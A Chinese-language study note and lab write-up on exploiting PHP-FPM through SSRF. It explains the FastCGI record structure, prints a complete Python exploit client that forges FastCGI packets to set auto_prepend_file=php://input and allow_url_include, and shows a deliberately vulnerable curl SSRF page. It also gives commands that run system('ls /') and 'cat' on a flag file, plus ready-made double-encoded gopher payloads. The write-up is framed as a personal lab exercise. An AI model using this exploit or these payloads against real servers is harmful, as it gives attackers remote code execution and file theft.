SSRF 攻击PHP-FPM（FastCGI 攻击）：学习总结仅供参考

利用条件：

Libcurl版本：高于7.45.0

PHP-FPM：监听端口，版本高于5.3.3

知道目标机器上任意一个php文件绝对路径

一、FastCGI

fastcgi其实是一个通信协议，和HTTP协议一样，都是进行数据交换的一个通道。HTTP协议是浏览器和服务器中间件进行数据交换的协议，浏览器将HTTP头和HTTP体用某个规则组装成数据包，以TCP的方式发送到服务器中间件，服务器中间件按照规则将数据包解码，并按要求拿到用户需要的数据，再以HTTP协议的规则打包返回给服务器。

fastcgi协议则是服务器中间件和某个语言后端进行数据交换的协议。Fastcgi协议由多个record组成，record也有header和body一说，服务器中间件将这二者按照fastcgi的规则封装好发送给语言后端，语言后端解码以后拿到具体数据，进行指定操作，并将结果再按照该协议封装好后返回给服务器中间件。

record的头固定8个字节，body的大小由头部中contentLenght指定（两字节），结构如下

typedef struct {/* Header */unsigned char version; // 版本unsigned char type; // 本次record的类型unsigned char requestIdB1; // 本次record对应的请求idunsigned char requestIdB0;unsigned char contentLengthB1; // body体的大小unsigned char contentLengthB0;unsigned char paddingLength; // 额外块大小unsigned char reserved;     //保留字段/* Body */unsigned char contentData[contentLength];     //body内容数据unsigned char paddingData[paddingLength];     //填充数据
} FCGI_Record;

type字段选项

enum FCGI_Type {FCGI_BEGIN_REQUEST     = 1,  // (WEB->FastCGI) 表示一次请求的开始FCGI_ABORT_REQUEST     = 2,  // (WEB->FastCGI) 表示终止一次请求FCGI_END_REQUEST       = 3,  // (FastCGI->WEB) 请求已被处理完毕FCGI_PARAMS            = 4,  // (WEB->FastCGI) 表示一个向CGI程序传递的环境变量FCGI_STDIN             = 5,  // (WEB->FastCGI) 表示向CGI程序传递的标准输入FCGI_STDOUT            = 6,  // (FastCGI->WEB) 表示CGI程序的标准输出   FCGI_STDERR            = 7,  // (FastCGI->WEB) 表示CGI程序的标准错误输出FCGI_DATA              = 8,  // (WEB->FastCGI) 向CGI程序传递的额外数据FCGI_GET_VALUES        = 9,  // (WEB->FastCGI) 向FastCGI程序询问一些环境变量FCGI_GET_VALUES_RESULT = 10, // (FastCGI->WEB) 询问环境变量的结果FCGI_UNKNOWN_TYPE      = 11  // 未知类型，可能用作拓展
};

二、PHP-FPM

FastCGI是一个协议，PHP-FPM是实现了FastCGI协议的程序，全称PHP FastCGI Process Manager 即PHP FastCGI的进程管理器,运行在默认运行在9000端口。

现在知道服务器中间件与PHP_FPM使用FastCGI通信，那么我们可以伪造FastCGI协议包与PHP-FPM通信实现任意代码执行。FastCGI中只能传输配置信息，可以更改配置信息来实现任意代码执行。

在php.ini中有如下两个配置项:

auto_prepend_file:在执行目标文件前，先包含其指定的文件，其可以使用伪协议如：php://input.

auto_append_file: 在执行目标文件后，包含其指向的文件

php://input：客户端HTTP请求中POST原始数据

如果设置 auto_prepend_file=php://input 那么每个文件执行前会包含HTTP请求中的POST数据，但php://input需要开启 allow_url_include:On，可以通过FastCGI中的PHP_ADMIN_VALUE选项修如：PHP_ADMIN_VALUE:allow_url_include:On

三、编写EXP（代码来自大佬）

import socket
import random
import argparse
import sys
from io import BytesIO# Referrer: https://github.com/wuyunfeng/Python-FastCGI-ClientPY2 = True if sys.version_info.major == 2 else False     #判断python 版本def bchr(i):if PY2:return force_bytes(chr(i))else:return bytes([i])def bord(c):if isinstance(c, int):return celse:return ord(c)def force_bytes(s):if isinstance(s, bytes):return selse:return s.encode('utf-8', 'strict')def force_text(s):if issubclass(type(s), str):return sif isinstance(s, bytes):s = str(s, 'utf-8', 'strict')else:s = str(s)return sclass FastCGIClient:"""A Fast-CGI Client for Python"""# private__FCGI_VERSION = 1__FCGI_ROLE_RESPONDER = 1__FCGI_ROLE_AUTHORIZER = 2__FCGI_ROLE_FILTER = 3__FCGI_TYPE_BEGIN = 1__FCGI_TYPE_ABORT = 2__FCGI_TYPE_END = 3__FCGI_TYPE_PARAMS = 4__FCGI_TYPE_STDIN = 5__FCGI_TYPE_STDOUT = 6__FCGI_TYPE_STDERR = 7__FCGI_TYPE_DATA = 8__FCGI_TYPE_GETVALUES = 9__FCGI_TYPE_GETVALUES_RESULT = 10__FCGI_TYPE_UNKOWNTYPE = 11__FCGI_HEADER_SIZE = 8# request stateFCGI_STATE_SEND = 1FCGI_STATE_ERROR = 2FCGI_STATE_SUCCESS = 3def __init__(self, host, port, timeout, keepalive):self.host = hostself.port = portself.timeout = timeoutif keepalive:self.keepalive = 1else:self.keepalive = 0self.sock = Noneself.requests = dict()def __connect(self):self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)self.sock.settimeout(self.timeout)self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)# if self.keepalive:#     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)# else:#     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)try:self.sock.connect((self.host, int(self.port)))except socket.error as msg:self.sock.close()self.sock = Noneprint(repr(msg))return Falsereturn Truedef __encodeFastCGIRecord(self, fcgi_type, content, requestid):length = len(content)buf = bchr(FastCGIClient.__FCGI_VERSION) \+ bchr(fcgi_type) \+ bchr((requestid >> 8) & 0xFF) \+ bchr(requestid & 0xFF) \+ bchr((length >> 8) & 0xFF) \+ bchr(length & 0xFF) \+ bchr(0) \+ bchr(0) \+ contentreturn bufdef __encodeNameValueParams(self, name, value):nLen = len(name)vLen = len(value)record = b''if nLen < 128:record += bchr(nLen)else:record += bchr((nLen >> 24) | 0x80) \+ bchr((nLen >> 16) & 0xFF) \+ bchr((nLen >> 8) & 0xFF) \+ bchr(nLen & 0xFF)if vLen < 128:record += bchr(vLen)else:record += bchr((vLen >> 24) | 0x80) \+ bchr((vLen >> 16) & 0xFF) \+ bchr((vLen >> 8) & 0xFF) \+ bchr(vLen & 0xFF)return record + name + valuedef __decodeFastCGIHeader(self, stream):header = dict()header['version'] = bord(stream[0])header['type'] = bord(stream[1])header['requestId'] = (bord(stream[2]) << 8) + bord(stream[3])header['contentLength'] = (bord(stream[4]) << 8) + bord(stream[5])header['paddingLength'] = bord(stream[6])header['reserved'] = bord(stream[7])return headerdef __decodeFastCGIRecord(self, buffer):header = buffer.read(int(self.__FCGI_HEADER_SIZE))if not header:return Falseelse:record = self.__decodeFastCGIHeader(header)record['content'] = b''if 'contentLength' in record.keys():contentLength = int(record['contentLength'])record['content'] += buffer.read(contentLength)if 'paddingLength' in record.keys():skiped = buffer.read(int(record['paddingLength']))return recorddef request(self, nameValuePairs={}, post=''):if not self.__connect():print('connect failure! please check your fasctcgi-server !!')returnrequestId = random.randint(1, (1 << 16) - 1)    # 1 --65535self.requests[requestId] = dict()request = b""beginFCGIRecordContent = bchr(0) \+ bchr(FastCGIClient.__FCGI_ROLE_RESPONDER) \+ bchr(self.keepalive) \+ bchr(0) * 5request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_BEGIN,beginFCGIRecordContent, requestId)paramsRecord = b''if nameValuePairs:for (name, value) in nameValuePairs.items():name = force_bytes(name)value = force_bytes(value)paramsRecord += self.__encodeNameValueParams(name, value)if paramsRecord:request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, paramsRecord, requestId)request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_PARAMS, b'', requestId)if post:request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, force_bytes(post), requestId)request += self.__encodeFastCGIRecord(FastCGIClient.__FCGI_TYPE_STDIN, b'', requestId)self.sock.send(request)self.requests[requestId]['state'] = FastCGIClient.FCGI_STATE_SENDself.requests[requestId]['response'] = b''return self.__waitForResponse(requestId)def __waitForResponse(self, requestId):data = b''while True:buf = self.sock.recv(512)if not len(buf):breakdata += bufdata = BytesIO(data)while True:response = self.__decodeFastCGIRecord(data)if not response:breakif response['type'] == FastCGIClient.__FCGI_TYPE_STDOUT \or response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:if response['type'] == FastCGIClient.__FCGI_TYPE_STDERR:self.requests['state'] = FastCGIClient.FCGI_STATE_ERRORif requestId == int(response['requestId']):self.requests[requestId]['response'] += response['content']if response['type'] == FastCGIClient.FCGI_STATE_SUCCESS:self.requests[requestId]return self.requests[requestId]['response']def __repr__(self):return "fastcgi connect host:{} port:{}".format(self.host, self.port)if __name__ == '__main__':parser = argparse.ArgumentParser(description='Php-fpm code execution vulnerability client.')parser.add_argument('host', help='Target host, such as 127.0.0.1')parser.add_argument('file', help='A php file absolute path, such as /usr/local/lib/php/System.php')parser.add_argument('-c', '--code', help='What php code your want to execute', default='<?php phpinfo(); exit; ?>')parser.add_argument('-p', '--port', help='FastCGI port', default=9000, type=int)args = parser.parse_args()client = FastCGIClient(args.host, args.port, 3, 0)params = dict()documentRoot = "/"uri = args.filecontent = args.codeparams = {'GATEWAY_INTERFACE': 'FastCGI/1.0','REQUEST_METHOD': 'POST','SCRIPT_FILENAME': documentRoot + uri.lstrip('/'),'SCRIPT_NAME': uri,'QUERY_STRING': '','REQUEST_URI': uri,'DOCUMENT_ROOT': documentRoot,'SERVER_SOFTWARE': 'php/fcgiclient','REMOTE_ADDR': '127.0.0.1','REMOTE_PORT': '9985','SERVER_ADDR': '127.0.0.1','SERVER_PORT': '80','SERVER_NAME': "localhost",'SERVER_PROTOCOL': 'HTTP/1.1','CONTENT_TYPE': 'application/text','CONTENT_LENGTH': "%d" % len(content),'PHP_VALUE': 'auto_prepend_file = php://input','PHP_ADMIN_VALUE': 'allow_url_include = On'}response = client.request(params, content)print(force_text(response))

四、实验靶场搭建

1、环境准备

腾讯云服务器：ubuntu

nginx php-fpm(7.4) Libcurl(7.74)

php-fpm监听9000端口，nginx将php义务转发自9000端口

php扩展curl模块（apt-getinstall php7-fpm)

php.ini中导入curl.so配置：

2、建一存在ssrf漏洞的站点：

<?php$url=$_GET['url'];
$ch=curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,0);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,0);
$res=curl_exec($ch);
curl_close($ch);?>

输入网址：http://ip/index.php?url=www.baidu.com 验证站点

3、在根目录下放flag文件

五、攻击练习

伪造FastCGI数据：

利用大佬写好的脚本运行

 python fpm.py -c "<?php system('ls /');?>" -p 12345 127.0.0.1 /var/www/html/index.php

另一边监听端口得到数据

xxd 查看数据

将数据url两次编码:

利用脚本

# -*- coding: UTF-8 -*-
from urllib.parse import quote, unquote, urlencode
file= open('1.txt','rb')
payload= file.read()
payload= quote(payload).replace("%0A","%0A%0D")
print("gopher://127.0.0.1:9000/_"+quote(payload))

得到gopher数据

gopher://127.0.0.1:9000/_%2501%2501P%25A8%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504P%25A8%2501%25DB%2500%2500%250E%2502CONTENT_LENGTH23%250C%2510CONTENT_TYPEapplication/text%250B%2504REMOTE_PORT9985%250B%2509SERVER_NAMElocalhost%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250E%2504REQUEST_METHODPOST%250B%2502SERVER_PORT80%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2500QUERY_STRING%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%250D%2501DOCUMENT_ROOT/%250B%2509SERVER_ADDR127.0.0.1%250B%2517REQUEST_URI/var/www/html/index.php%2501%2504P%25A8%2500%2500%2500%2500%2501%2505P%25A8%2500%2517%2500%2500%253C%253Fphp%2520system%2528%2527ls%2520/%2527%2529%253B%253F%253E%2501%2505P%25A8%2500%2500%2500%2500

在浏览器通过ssrf漏洞站点将数据打入成功爆出根目录发现falg 文件

现在同样伪造数据将falg文件内容爆出

 python fpm.py -c "<?php system('cat /falg');?>" -p 12345 127.0.0.1 /var/www/html/index.php

得到数据

gopher://127.0.0.1:9000/_%2501%2501%2518.%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2518.%2501%25DB%2500%2500%250E%2502CONTENT_LENGTH28%250C%2510CONTENT_TYPEapplication/text%250B%2504REMOTE_PORT9985%250B%2509SERVER_NAMElocalhost%2511%250BGATEWAY_INTERFACEFastCGI/1.0%250F%250ESERVER_SOFTWAREphp/fcgiclient%250B%2509REMOTE_ADDR127.0.0.1%250F%2517SCRIPT_FILENAME/var/www/html/index.php%250B%2517SCRIPT_NAME/var/www/html/index.php%2509%251FPHP_VALUEauto_prepend_file%2520%253D%2520php%253A//input%250E%2504REQUEST_METHODPOST%250B%2502SERVER_PORT80%250F%2508SERVER_PROTOCOLHTTP/1.1%250C%2500QUERY_STRING%250F%2516PHP_ADMIN_VALUEallow_url_include%2520%253D%2520On%250D%2501DOCUMENT_ROOT/%250B%2509SERVER_ADDR127.0.0.1%250B%2517REQUEST_URI/var/www/html/index.php%2501%2504%2518.%2500%2500%2500%2500%2501%2505%2518.%2500%251C%2500%2500%253C%253Fphp%2520system%2528%2527cat%2520/flag%2527%2529%253B%253F%253E%2501%2505%2518.%2500%2500%2500%2500

成功爆出flag